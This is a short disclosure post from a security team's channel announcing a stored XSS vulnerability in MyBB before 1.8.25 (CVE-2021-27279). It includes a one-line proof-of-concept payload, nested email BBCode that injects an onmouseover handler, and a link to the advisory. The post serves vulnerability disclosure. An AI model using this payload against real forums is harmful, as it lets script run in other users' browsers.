PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vu | PT SWARM

PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy.

Payload: [email]a@a.a?[email=a@a.a? onmouseover=alert(1) a]a[/email][/email]

Advisory: https://github.com/mybb/mybb/security/advisories/GHSA-6483-hcpp-p75w

PT SWARM

🕵️ 2.98K
Technologies

Positive Technologies Offensive Team: twitter.com/ptswarm. This is the channel where we share articles/vulnerabilities/scripts/etc, not necessarily authored by us, that we find interesting...

Join
▲ Vote (1)

PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vu | PT SWARM

Login